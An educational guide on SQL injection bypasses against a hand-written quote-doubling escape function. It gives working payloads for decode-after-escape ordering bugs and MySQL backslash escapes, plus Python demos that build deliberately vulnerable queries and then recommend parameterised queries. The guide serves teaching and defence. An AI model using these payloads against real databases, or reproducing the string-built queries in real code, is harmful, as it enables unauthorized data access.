TL;DR
This guide looks at a simple SQL escape function that doubles single quotes, shows which of the commonly suggested bypasses actually work against it (and which do not), and explains why. It’s for educational purposes only – never use these methods on systems you don’t have permission to test!
Understanding the Problem
Many web applications try to prevent SQL injection by escaping special characters in user input before including it in a query. However, these escape functions aren’t always complete and can be bypassed: the escape may run before a later decoding step, it may be written for a different SQL dialect than the one in use, or it may be applied to a value that is never placed inside quotes at all.
Scenario
Let’s assume an application uses a function like this (PHP example) to escape single quotes:
function escapeString($string) {
    // Double every single quote so it is read as a literal quote inside '...'
    return str_replace("'", "''", $string);
}
This replaces each single quote (') with two single quotes (''), which is how standard SQL represents a literal quote inside a quoted string. It does stop the textbook payloads; the bypasses below all rely on something else undoing the escape, or on the database reading the literal by rules the function does not know about.
Bypass Techniques
- Double Encoding: the escape function only sees the bytes it is handed. If any decoding step runs after the escape (a second URL decode, a framework that decodes parameters late, a template layer that decodes entities), send the quote in that encoding. escapeString() finds no quote in %27 and leaves it alone; the later decode turns it back into ' inside the query. Double-encoding (%2527) covers the case where one decode happens before the escape and another after it.
- Alternative representations of the quote: the same ordering rule applies to the HTML entity ' (or ') and to the hex form 0x27. They only help if they are still encoded when escapeString() runs and are decoded afterwards; decoding them before the escape just produces a quote that gets doubled. Note that U+0027 is the ordinary apostrophe itself, which the function already replaces.
- Quote doubling does not break out of the literal: in a query like SELECT * FROM users WHERE username = '$username', inputting ' OR '1'='1 is escaped to '' OR ''1''=''1 and the query becomes SELECT * FROM users WHERE username = ''' OR ''1''=''1'. Each '' inside the literal is one quote character, so the whole value is the string ' OR '1'='1 and the query is harmless. This payload only works where the value is interpolated without surrounding quotes.
- Comments do not help on their own: '-- becomes ''--, i.e. the literal string '--. Nothing is commented out unless the literal has already been terminated by one of the other techniques.
- Backslash escapes (MySQL and MariaDB with the default sql_mode): the server also treats \' as an escaped quote. Inputting \' OR 1=1 -- (with a trailing space) is escaped to \'' OR 1=1 -- and lands in the query as '\'' OR 1=1 -- '. The server reads \' as a quote character, the next ' closes the literal, OR 1=1 is executed, and -- comments out the dangling quote. Quote doubling alone is therefore insufficient for MySQL unless NO_BACKSLASH_ESCAPES is set.
- Case variation such as SeLeCt targets keyword blacklists; it has no effect on a function that only rewrites quotes.
Practical Example
Let’s say the vulnerable application uses the following query:
SELECT * FROM products WHERE name = '$name'
And the escape function is the simple one shown earlier. Here is what the popular payloads actually produce, followed by the ones that work:
- Input: '--
  Resulting query: SELECT * FROM products WHERE name = '''--'
  The quote is doubled, so the literal is the string '-- and nothing after it is a comment; the query simply returns no rows.
- Input: ' OR '1'='1
  Resulting query: SELECT * FROM products WHERE name = ''' OR ''1''=''1'
  This compares name with the literal string ' OR '1'='1 and returns nothing, not all rows.
- Input (decoded after escaping): %27 OR %271%27=%271
  The escape sees no quote and leaves the value untouched; a URL decode that runs afterwards produces
  SELECT * FROM products WHERE name = '' OR '1'='1'
  which returns every row.
- Input (MySQL/MariaDB with backslash escapes enabled): \' OR 1=1 -- (note the trailing space)
  Resulting query: SELECT * FROM products WHERE name = '\'' OR 1=1 -- '
  \' is an escaped quote, the next ' closes the literal, OR 1=1 is executed and -- comments out the stray quote; every row is returned.
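The following is an added example, not code from the original page: it reproduces escapeString() in Python, builds the products query exactly as above, and runs it against an in-memory SQLite table (the table, its three rows and the payloads are constructed for the demo). It covers the payloads from the Bypass Techniques list and the Practical Example: the quote-doubling and comment payloads stay inside the literal, a decode that runs after the escape lets the encoded quote through, and a parameterised query is unaffected by either. The backslash case needs MySQL's escaping rules and is not exercised here because SQLite does not have them.

```python
# Added example, not code from the original page: the page's escapeString()
# reproduced in Python and exercised against an in-memory SQLite table.
# The "products" table, its three rows and the payloads are constructed
# here for the demonstration. SQLite, like standard SQL, treats '' inside a
# literal as one quote and has no backslash escapes, so it shows exactly why
# the textbook payloads fail and why a decode-after-escape ordering bug works.
import sqlite3
from urllib.parse import unquote


def escape_string(s: str) -> str:
    """Equivalent of the page's escapeString(): double every single quote."""
    return s.replace("'", "''")


def build_query(name: str, decode_after_escape: bool = False) -> str:
    """The vulnerable construction: escape the value, then interpolate it
    into a quoted literal.

    decode_after_escape=True models an application in which a URL decode
    runs *after* the escape (a second decoding layer further down the
    stack); this ordering is what lets an encoded quote survive escaping.
    """
    value = escape_string(name)
    if decode_after_escape:
        value = unquote(value)  # the ordering bug: quotes reappear after escaping
    return f"SELECT * FROM products WHERE name = '{value}'"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO products (name) VALUES (?)",
        [("widget",), ("gadget",), ("gizmo",)],
    )
    return conn


def rows_for(raw_input: str, decode_after_escape: bool = False) -> int:
    """Run the string-built query and return how many rows come back."""
    conn = make_db()
    try:
        return len(conn.execute(build_query(raw_input, decode_after_escape)).fetchall())
    finally:
        conn.close()


def rows_for_param(value: str) -> int:
    """Hardened form: the value is bound as a parameter and never becomes
    part of the SQL text, so neither escaping nor decoding order matters."""
    conn = make_db()
    try:
        cur = conn.execute("SELECT * FROM products WHERE name = ?", (value,))
        return len(cur.fetchall())
    finally:
        conn.close()


if __name__ == "__main__":
    # Quote doubling keeps these inside the literal: 0 rows each.
    for payload in ["' OR '1'='1", "'--"]:
        print(repr(payload), "->", build_query(payload), "->", rows_for(payload), "rows")
    # The encoded quote is missed by the escape and restored afterwards: every row.
    encoded = "%27 OR %271%27=%271"
    print(repr(encoded), "->", build_query(encoded, True), "->",
          rows_for(encoded, decode_after_escape=True), "rows")
    # Parameterised query given the already-decoded payload: still 0 rows.
    print("parameterised:", rows_for_param(unquote(encoded)), "rows")
```

Running the script prints the exact query text for each payload next to the row count, which is the quickest way to convince yourself that ''' OR ''1''=''1' is one string and that only the decode-after-escape variant turns into '' OR '1'='1'.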
Important Considerations
- Database Type: which bypasses work depends on the SQL dialect. SQLite, SQL Server and PostgreSQL (with standard_conforming_strings on, the default since 9.1) recognise only '' inside a literal, so quote doubling is complete for them. MySQL and MariaDB additionally honour backslash escapes unless sql_mode contains NO_BACKSLASH_ESCAPES, which is what makes the \' technique work. Comment syntax differs too: MySQL requires a space after --.
- Application Logic: trace the value from the request to the query and note every decode step, in particular any that runs after the escape. Check whether the value actually ends up inside quotes; a numeric id, an ORDER BY column or a LIMIT value interpolated unquoted needs no quote at all, and escaping quotes does nothing there.
- Error Messages: pay attention to error messages – they can reveal the database type and how the literal was parsed. A syntax error for an input ending in a single backslash, for instance, indicates that the server consumed the closing quote as \', i.e. that backslash escapes are active.
- Fixing it: the robust defence is parameterised queries (prepared statements), which keep the value out of the SQL text altogether. If escaping is unavoidable, use the database driver’s own function for the open connection (mysqli_real_escape_string in PHP, for example), which knows the connection’s character set and escaping rules, rather than a hand-written str_replace.
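To make the Database Type point concrete, here is an added example (not code from the original page) with a minimal scanner for a single-quoted SQL literal under the two escaping rules discussed: standard quote doubling only, and MySQL/MariaDB's default where a backslash also escapes the following character. It escapes the input with the page's function, builds the products query, and reports what the server would see: the literal's value and any SQL left over after the closing quote. The scanner is a model written for this example, not the servers' own parser, and the payloads are constructed.

```python
# Added example, not code from the original page: a minimal scanner for a
# single-quoted SQL literal that models the two escaping rules behind the
# "Database Type" point. With backslash_escapes=False it follows standard
# SQL (SQLite, SQL Server, PostgreSQL with standard_conforming_strings=on),
# where only '' is special; with backslash_escapes=True it follows the
# MySQL/MariaDB default, where \x also escapes the next character.
# The query text and payloads are constructed here; this is a model of the
# parsing rules, not the servers' own code.

QUERY_PREFIX = "SELECT * FROM products WHERE name = "


def escape_string(s: str) -> str:
    """Equivalent of the page's escapeString(): double every single quote."""
    return s.replace("'", "''")


def split_literal(sql: str, backslash_escapes: bool) -> tuple[str, str]:
    """sql must start with a single quote. Return (decoded literal value,
    SQL text remaining after the closing quote); raise ValueError if the
    literal never closes."""
    if not sql.startswith("'"):
        raise ValueError("expected a single-quoted literal")
    out, i, n = [], 1, len(sql)
    while i < n:
        c = sql[i]
        if backslash_escapes and c == "\\" and i + 1 < n:
            out.append(sql[i + 1])  # \x is the character x, including \'
            i += 2
        elif c == "'":
            if i + 1 < n and sql[i + 1] == "'":
                out.append("'")  # '' is one literal quote in every dialect
                i += 2
            else:
                return "".join(out), sql[i + 1:]
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated string literal")


def analyse(user_input: str, backslash_escapes: bool) -> dict:
    """Escape the input as the page does, build the query, and report what
    the server would see: the literal's value and any SQL left over after
    the closing quote (non-empty means the input broke out)."""
    query = QUERY_PREFIX + "'" + escape_string(user_input) + "'"
    try:
        literal, rest = split_literal(query[len(QUERY_PREFIX):], backslash_escapes)
    except ValueError as err:
        return {"query": query, "literal": None, "injected_sql": None, "error": str(err)}
    return {"query": query, "literal": literal, "injected_sql": rest.strip(), "error": None}


if __name__ == "__main__":
    for payload in ["' OR '1'='1", "\\' OR 1=1 -- "]:
        for mode in (False, True):
            r = analyse(payload, backslash_escapes=mode)
            print(f"backslash_escapes={mode}: {r['query']}")
            print(f"  literal={r['literal']!r} injected_sql={r['injected_sql']!r}")
```

Under standard rules both payloads stay inside the literal. Under MySQL rules \' OR 1=1 -- leaves OR 1=1 -- ' outside the literal, and the trailing -- (with its space) is what keeps the dangling quote from producing a syntax error. An input that ends in a single backslash shows the other symptom mentioned above: the scanner raises "unterminated string literal" in backslash mode, which is the error the server would report.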
Disclaimer
This information is for educational purposes only. Attempting to exploit vulnerabilities without permission is illegal and unethical. Always obtain explicit consent before testing any system.